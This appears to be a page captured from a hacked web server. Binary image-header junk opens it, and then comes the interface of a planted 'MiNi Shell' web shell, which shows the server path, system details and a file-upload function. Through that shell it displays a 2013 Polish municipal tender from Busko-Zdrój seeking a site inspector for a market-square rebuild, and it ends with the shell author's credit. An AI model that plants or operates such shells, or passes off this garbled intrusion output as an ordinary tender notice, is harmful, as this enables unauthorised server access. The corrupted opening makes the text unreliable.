JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130219/26671-N-2013.html

<p class="kh_header"><b>Busko-Zdrój: PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO NAD ZADANIEM:
*Poprawa warunków sprzedaży bezpośredniej poprzez przebudowę miejskiego Placu Targowego przy ul. Stawowej w Busku-Zdroju  w ramach programu *Mój Rynek**</b><br>
<b>Numer ogłoszenia: 26671 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy , ul. Adama Mickiewicza 10, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3705200, faks 041 3705290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.busko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO NAD ZADANIEM:
*Poprawa warunków sprzedaży bezpośredniej poprzez przebudowę miejskiego Placu Targowego przy ul. Stawowej w Busku-Zdroju  w ramach programu *Mój Rynek**.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na pełnieniu funkcji inspektora nadzoru inwestorskiego nad zadaniem: *Poprawa warunków sprzedaży bezpośredniej poprzez przebudowę miejskiego Placu Targowego przy ul. Stawowej w Busku-Zdroju  w ramach programu *Mój Rynek**.  
Zamawiający wymaga  zapewnienia ciągłego nadzoru inwestorskiego nad realizacją całości robót objętych zadaniem *Poprawa warunków sprzedaży bezpośredniej poprzez przebudowę miejskiego Placu Targowego przy ul. Stawowej w Busku-Zdroju w ramach programu *Mój Rynek**.  

2. Pełnienie obowiązków Inspektora Nadzoru Inwestorskiego będzie obejmowało:
2.1.zapewnienie nadzoru inwestorskiego nad całością realizacji robót budowlanych wszystkich branż (konstrukcyjno-budowlanej, drogowej; instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych; instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych)
a. 	pełnienie nadzoru inwestorskiego nad robotami  zgodnie z decyzją o pozwoleniu na budowę zadaszonych wiat handlowych (kategorii XVII) ..., Starosty Buskiego z dnia 09.08.2012r. (Decyzja Nr 363/12);
b.  	zarządzanie techniczne, finansowe i administracyjne zadaniem;
c.  	organizację i koordynację całego zadania;
d. zapewnienie prawidłowej i terminowej realizacji inwestycji, w tym zgodnie z 	harmonogramem przedstawionym przez Wykonawcę;
e. sprawdzanie kompletności oraz prawidłowości dokumentów sporządzanych przez 	Wykonawcę w trakcie realizacji robót (w tym rozliczeń finansowych), zgodnie z zapisami 	umowy z Wykonawcą robót;
f. 	pełnienie obowiązków wynikających z art. 25 i 26 ustawy z dnia 7 lipca 1994r. - Prawo 	budowlane;
g. 	reprezentowanie Zamawiającego na budowie we wszystkich kwestiach technicznych 	związanych z realizacją inwestycji;
h. 	kontrolę prawidłowości wykonywania robót budowlanych pod względem zgodności 	z projektem oraz pozostałymi dokumentami technicznymi, szczegółowymi przepisami, 	normami, zasadami wiedzy technicznej i sztuką budowlaną;
i. 	w przypadku stwierdzenia wad projektowych albo konieczności wprowadzenia zmian w 	trakcie realizacji robót - przygotowanie pisemnego wystąpienia do projektanta, 	uzasadniającego i opisującego wprowadzenie koniecznych zmian; 
j. 	pisemne opiniowanie propozycji zmian technologii wykonania, materiałowych oraz 	wyposażenia proponowanych przez Wykonawcę i Zamawiającego;
k. sprawdzenie jakości wykonywanych robót oraz wykorzystywanych wyrobów 	budowlanych. Inspektor Nadzoru nie może dopuścić do zastosowanych wyrobów i 	materiałów wadliwych lub niedopuszczonych do stosowania w budownictwie;
l. 	sprawdzenie i odbiór robót budowlanych ulegających zakryciu lub zanikających, 	uczestniczenie w próbach i odbiorach technicznych (również tych prowadzonych przez 	dysponentów sieci);
ł. 	udział w odbiorach częściowych i w odbiorze końcowym, oraz potwierdzenie usunięcia 	wad i usterek wskazanych w protokołach odbioru;
m. udział w spotkaniach koordynacyjnych z Zamawiającym w dni robocze w godz.  	urzędowania (pracy) Urzędu:	 - poniedziałek 8:00 - 16:00,  od wtorku do piątku 7:00 - 	15:00
n. 	potwierdzanie obmiaru robót, jako podstawy do zapłaty wynagrodzenia Wykonawcy 	robót.
o. informowanie Zamawiającego o postępach robót budowlanych i wszelkich 	okolicznościach, które mogą mieć wpływ na wydłużenie terminu i zmianę kosztów 	realizacji inwestycji;
u. obsługę okresu gwarancyjnego i okresu rękojmii: uczestnictwo w przeglądach 	gwarancyjnych, inspekcję wad usuwanych przez Wykonawcę robót budowlanych.

 
3. Zakres prac objętych zadaniem  *Poprawa warunków sprzedaży bezpośredniej poprzez przebudowę miejskiego Placu Targowego przy ul. Stawowej w Busku-Zdroju  w ramach programu *Mój Rynek**  obejmuje:

3.1. Budowę zadaszonych wiat handlowych o powierzchni handlowej zadaszenia 840[m2] na części działki nr 512 w m. Busko-Zdrój.
a) Na zagospodarowywanym terenie zostanie usytuowanych osiem wiat handlowych ustawionych w jednym ciągu tworzącym całość. Każda wiata o dwuspadowym dachu. Konstrukcja więźby dachowej  z drewna struganego suszonego - II klasa, oparta na słupach żelbetowych o wysokości do 4m;   
b) Pokrycie wiat handlowych wykonane z blachy cynkowo-tytanowej na rąbek stojący o 			powierzchni 889m2;
c) W środkowej części każdej z wiat przewiduje się wykonanie przeszklonych świetlików 			stanowiących doświetlenie części handlowej o łącznej powierzchni przeszklenia 48m2;
d) Pod wiatą przewidziane są stanowiska sprzedaży artykułów rolno- spożywczo-	przemysłowych tj. 	stoły żelbetowe z betonu B25 z żaluzją aluminiową w ilości 56 szt. oraz 	ścianka żelbetowa z betonu B25 z półkami drewnianymi i żaluzją aluminiową w ilości 	12szt. 

3.2. Budowę budynku sanitarno- socjalnego o wymiarach 5,25x21,80[m] zlokalizowanego w płd.-wsch. części działki nr 512 o powierzchni zabudowy budynku 86[m2] z wewnętrznymi instalacjami: wod.-kan., eNn, c.o.
a) Budynek sanitarno-socjalny jako budynek parterowy z dachem dwuspadowym  	symetrycznym o powierzchni zabudowy 86m2;
b) Budynek pełni funkcję zaplecza higieniczo-sanitarnego dla targowiska, przeznaczony dla 	osób z  obsługi targowiska, osób sprzedających i klientów;
c)	Na zachodniej stronie części socjalnej i sanitarnej zostaną usytuowane tzw. punkty czerpalne wyposażone w zlewy.

3.3. Budowę przyłączy:  kanalizacji deszczowej kanalizacji sanitarnej, wody.
	a) Odwodnienie obejmuje odprowadzenie wód deszczowych z powierzchni dachów, placów i 	dróg dojazdowych. Kanały deszczowe w rur PCV  (kd 160 - 33,20m, kd 200 - 168,55m, 	kd  250 - 15m);
b) Wykonanie przyłącza wodociągowego do budynku sanitarno-socjalnego z rur PE100 SDR  	    17dn 40 na długości 5,2m;
c)  Wykonanie przyłącza kanalizacji sanitarnej do budynku sanitarno-socjalnego z rur 	 	kanalizacyjnych PCVSDR34 litych o długości 15,35m.

3.4. Budowę oświetlenia terenu.
W celu oświetlenia terenu należy wykonać słupy parkowe o wysokości 3,5m - 8szt. Na fundamencie 80 z oprawami parkowymi o źródle światła sodowym o mocy 70W. Oświetlenie terenu zasilać z RG poprzez kabel YKY 3x4. Sterowanie oświetleniem realizowane będzie poprzez sterownik z zegarem astronomicznym zamontowanym w RG.

3.5.Zagospodarowanie terenu i prace drogowe.
a) Roboty rozbiórkowe: usunięcie nawierzchni asfaltowej -1804[m2], usunięcie baraku 	wolnostojacego bez fundamentów - 2,5x3,5[m], usunięcie 2 szt. garaży blaszanych -	3x5,5[m] i inne;
b) Wykonanie nawierzchni utwardzonej w obrębie wiaty: chodniki z płyt betonowych  	50x50x7[cm] w kolorze szarym - 662[m2], nawierzchnia z kostki brukowej o grubości 	6[cm] w kolorze szarym - 178[m2];
c)	Chodniki z kostki brukowej betonowej szarej o grubości 6cm - 578[m2]
d)	Nawierzchnie z mieszanek mineralno-asfaltowych grubość warstwy ścieralnej po 	zagęszczeniu 5cm  - 290[m2]
e) Remonty cząstkowe nawierzchni bitumicznych - 704[m2]

3.6. Budowie obiektów małej architektury:  (ławki parkowe - 6szt., kosze na śmieci - 4 szt., stojaki rowerowe - 2 szt., tablice informacyjne zewnętrzne - 3 szt., donice na zieleń ozdobną - 6szt.).

3.7. Gospodarkę zielenią:
a) Wykonanie trawników dywanowych - 493m2;
b) Wykonanie nasadzeń drzew i krzewów liściastych (klon jawor, Brillantissimum) - 9szt.;
c)	Wypełnienie donic betonowych ziemią urodzajną i nasadzenie krzewów.

3.8. Budowę ogrodzenia terenu objętego przedmiotem zamówienia: ogrodzenie panelowe o wys. 1,53m na długości ok. 96m, montaż bram z paneli stalowych o wym. 400x100cm -3 szt. oraz furtki z paneli stalowych o wym. 100x100cm  -1 szt.

4. Szczegółowy zakres prac i obowiązków określają:
a)	dokumentacja techniczna, 
b)	przedmiary robót,
c)	specyfikacje techniczne wykonania i odbioru robót
d)	wzór umowy z Wykonawcą (załącznik nr 8 do SIWZ).
W/w dokumenty dostępne są na stronie Zamawiającego tj.http://bip.umig.busko.pl -w zakładce przetargi: http://www.umig.busko.pl/cms/zamowienia-publiczne/umig.html?start=8 *Poprawa warunków sprzedaży bezpośredniej poprzez przebudowę miejskiego Placu Targowego przy ul. Stawowej w Busku-Zdroju  w ramach programu *Mój Rynek**
- lub do wglądu w Urzędzie Miasta i Gminy w Busku-Zdroju w Wydziale Rozwoju Strategicznego Inwestycji i Drogownictwa - pokój nr 37
e) wzór umowy z Inspektorem- załączniki Nr 6 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli zapewniony zostanie nadzór nad robotami przez wykwalifikowanego inspektora.                                 
Zamawiający wymaga, aby Inspektor Nadzoru posiadał:

	- uprawnienia w specjalności konstrukcyjno- budowlanej - 1 osoba,
wraz z oświadczeniem,  że osoba ta posiada wymagane uprawnienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto do oferty należy dołączyć:

1. Wypełniony formularz ofertowy z wykorzystaniem wzoru wg Załącznika 1.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące okoliczności i warunki zmiany postanowień zawartej umowy.

1. Zmiana postanowień umowy wymaga formy pisemnej pod rygorem nieważności.

2.	Zmiana terminu wykonania przedmiotu umowy w stosunku do treści oferty, na podstawie, 	której dokonano wyboru Wykonawcy, może nastąpić w przypadkach,  	gdy ulegnie zmianie 	termin wykonania i rozliczenia robót budowlanych zadania.
3.	Zmiana  treści umowy w stosunku do treści  oferty, na podstawie, której dokonano wyboru 	Inspektora Nadzoru,  może nastąpić w w przypadku konieczności zastąpienia osób 	wyznaczonych do pełnienia funkcji inspektora Nadzoru nowymi osobami - zgodnie z 	procedurą opisaną we wzorze Umowy § 2 pkt 4-5.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umig.busko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Busku-Zdroju, ul. Mickiewicza 10, pok. Nr 37.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2013 godzina 10:00, miejsce: Urząd Miasta i Gminy w Busku-Zdroju, ul. Mickiewicza 10, pok. Nr 3 (Biuro Obsługi Interesanta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie stanowiące przedmiot zamówienia będzie współfinansowane ze środków Unii Europejskiej  w ramach Programu Rozwoju Obszarów Wiejskich, Działanie 321 *Podstawowe usługi dla gospodarki i ludności wiejskiej*..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com